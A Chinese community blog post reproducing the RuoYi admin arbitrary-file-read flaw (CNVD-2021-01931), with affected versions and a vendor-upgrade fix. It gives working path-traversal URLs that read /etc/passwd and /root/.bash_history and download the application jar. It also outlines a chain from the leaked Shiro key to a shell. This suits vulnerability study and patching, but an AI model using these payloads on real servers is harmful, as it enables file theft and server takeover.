若依后台任意文件读取(CNVD-2021-01931) 漏洞复现

举报
Vista_AX 发表于 2023/07/21 08:11:32 2023/07/21
【摘要】 若依后台任意文件读取(CNVD-2021-01931) 漏洞复现

01 漏洞描述




若依管理系统是基于SpringBoot的权限管理系统,部分版本登录后台后可以读取服务器上的任意文件


02 影响范围


RuoYi < v4.5.1

03 验证方式


登录后台后,浏览器直接尝试访问如下链接,如能成功下载则说明存在漏洞
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

image.png


## 04 利用方式


若依系统采用shiro框架,利用思路为通过后台任意文件读取获取shiro的key值,而后使用shiro漏洞利用工具getshell。

1、利用任意文件下载读取.bash_history,通过.bash_history得知网站jar路径

http://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../root/.bash_history

image.png


2、再次利用任意文件下载漏洞,下载前一步得知的jar包

http://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../www/wwroot/xxx/rouyi-admin_bak.jar

image.png


3、在源码中寻找shiro的key值后,使用漏洞利用工具进行getshell

image.png

image.png


05 修复方案


请联系厂商获取修复后的官方版本:http://www.ruoyi.vip/

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。